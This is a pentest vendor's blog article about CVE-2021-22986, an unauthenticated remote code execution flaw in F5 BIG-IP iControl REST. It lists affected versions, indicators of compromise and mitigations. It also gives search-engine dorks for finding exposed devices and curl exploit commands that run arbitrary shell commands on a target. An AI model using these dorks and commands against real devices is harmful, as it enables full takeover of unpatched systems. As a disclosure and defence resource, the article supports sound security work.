How to detect CVE-2021-22986 RCE with

Updated at
Reading time

As a pentester, when you see a major critical vulnerability persist for months in unpatched systems (like Log4Shell), you have a responsibility to help others understand its severity and how they can fix it. This is exactly why this article exists.

We saw a lot of vulnerable and unpatched systems out in the wild, even if the security flaw was discovered around March 2021, so we couldn’t just stand on the sidelines.

Discovered around March 2021, CVE-2021-22986 still keeps the door open for attackers in many vulnerable systems in the wild. So this guide is dedicated to how you can search for vulnerable hosts, how you can exploit the vulnerability, and the solution to mitigate it.

What is F5 iControl?

The F5 iControl is a REST-based API that allows you to execute multiple actions for BIG-IP devices that you manage, such as changing the system configuration.

F5 iControl REST-based API architecture (Source: F5 iControl Whitepaper)

What is CVE-2021-22986?

Let’s talk about the context of the vulnerability. It was discovered in early spring 2021 and, in spite of months have passed since a lot of devices are still vulnerable and many threat actors are actively exploiting this vuln in the wild.

But what makes it so attractive to malicious hackers?

The vulnerability has a CVSS score of 9.8 and was categorized as “Critical” because you can achieve full device compromise through Remote Command Execution. Even worse, you can do all of this unauthenticated. What’s more, the BIG-IP devices in Appliance mode are also vulnerable.

To make matters worse, it was also observed that a Mirai variant has been actively exploiting this vulnerability.

We are now observing the Mirai variant from attempting to exploit CVE-2021-22986, an unauthenticated RCE in F5 BIG-IP & BIG-IQ products, and CVE-2020-28188.

IOCs for the new activity available at:

— Unit 42 (@Unit42_Intel) March 19, 2021

Vulnerable products and versions

Here’s the list of affected products and their versions for the CVE-2021-22986 RCE flaw so you can check your tech stack for this vuln:

  • F5 BIG-IP Devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO):

    • 12.1.0-

    • 13.1.0-

    • 14.1.0-

    • 15.1.0-15.1.2

    • 16.0.0-16.0.1

  • F5 BIG-IQ Centralized Management:

    • 6.0.0-6.1.0

    • 7.0.0-

    • 7.1.0-

Now that you have the essential details you need, let’s take a look at how to detect and exploit it using

How to find systems potentially impacted by CVE-2021-22986

I’m about to showcase three main ways to find hosts and devices that may be affected by the CVE-2021-22986 vulnerability.

Using Shodan

At the time of writing this article, there were at least 6,000 devices found through Shodan.

F5 BIG-IP devices shodan

You can use the following query to discover F5 BIG-IP potentially devices vulnerable to this unauthenticated RCE vuln:


Using Google Dorks

F5 BIG-IP devices use web-based interfaces, so you can use Google Dorks to sniff out F5 hosts with the following search queries:

  • inurl:my.logout.php3?

  • inurl:”/my.policy” big-ip

  • intitle:”BIG-IP logout page”

  • intext:”Thank you for using BIG-IP.”

  • intext:”This product is licensed from F5 Networks.”

  • intext:”F5 Networks. All rights reserved”


Google Dorks page result

Using PublicWWW

PublicWWW is a search engine you can use to hunt for websites based on source code content, response headers, cookies, and technology used. You can use the same dorks I just mentioned and also a few more details such as:

  • “my.logout.php3”

  • “/my.policy”

  • “BIG-IP logout page”

  • “Thank you for using BIG-IP.”

  • “This product is licensed from F5 Networks.”

  • “F5 Networks. All rights reserved”

  • “Set-Cookie: F5_ST”

F5 BIG-IP devices google dorks Add this tool to your workflow by bookmarking 

How to exploit CVE-2021-22986 in ethical hacking engagements

In order to exploit the CVE-20212-22986, you must follow the below steps:

  1. curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’

  2. curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’

  3. curl -su admin: -H “Content-Type: application/json” http://<HOST>:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c <COMMAND>”}’

If you’re curious to try another, much faster exploitation tactic, keep reading and watch the demo below.

Known Indicators of Compromise (IoCs) for CVE-2021-22986

According to F5, you should look (manually) for the following entry in the /var/log/restjavad*.log file:

“X-F5-Auth-Token doesn’t have value”

How to detect and exploit CVE-2021-22986 using

The fastest and no-hassle way to validate that CVE-2021-22986 is exploitable on your target is to use Sniper Automatic Exploiter, the auto-attacker on

The tool simulates real-world exploitation and attack techniques automatically:

  • It scans for open ports, collecting data about the protocol, type of service and version

  • It fingerprints web services to determine the type of web application running and the tech stack behind it

  • It looks for compatible exploits 

  • It checks if the target is indeed vulnerable – without extracting any data at this stage

  • Once it gains RCE, Sniper automatically extracts all the artefacts (current and local users, system information, running processes, network configuration, etc.), which you’ll get in the output report

  • It does clean-up, so the target is left unaltered.  

As you can see from the demo, this all happens in literally a minute which is a massive gain compared to manual exploitation, especially when you’re pressed for time in a pentest (and when doesn’t that happen?).

How to detect F5 IControl REST Unauthenticated RCE (CVE-2021-22986) with

If you need a report with findings for the F5 iControl REST Unauthenticated RCE, you can use the Network Vulnerability Scanner. Run it on your target and get a full, ready-to-use report with rich details that you can share with colleagues and clients:

F5 iControl REST Unauthenticated RCE finding

How to mitigate CVE-2021-22986

First, it is recommended to install a patched version for your devices:

  • BIG-IP

  • BIG-IP

  • BIG-IP 14.1.4+

  • BIG-IP

  • BIG-IP

  • BIG-IQ

  • BIG-IQ

If for some reason, you can’t apply this patch, then you should restrict access to the iControl REST interface for any IP address except for your administrator’s one.

Working together to cope with the landslide

With a constant flow of vulnerabilities that keep security specialists in firefighting mode, it’s really difficult to keep up. That’s why we, at, believe in helping each other by sharing expertise, methods, and insights while supporting collaboration in a way that truly makes a difference. It’s not easy work but it is our work and we’re committed to doing the best job we can.

If there’s a specific guide you need that you’re missing to help you get ahead in your role and make a bigger impact at work – and in the industry – let us know!

Get vulnerability research & write-ups

In your inbox. (No fluff. Actionable stuff only.)

Ready to apply what you read?

Use our free tools

Related articles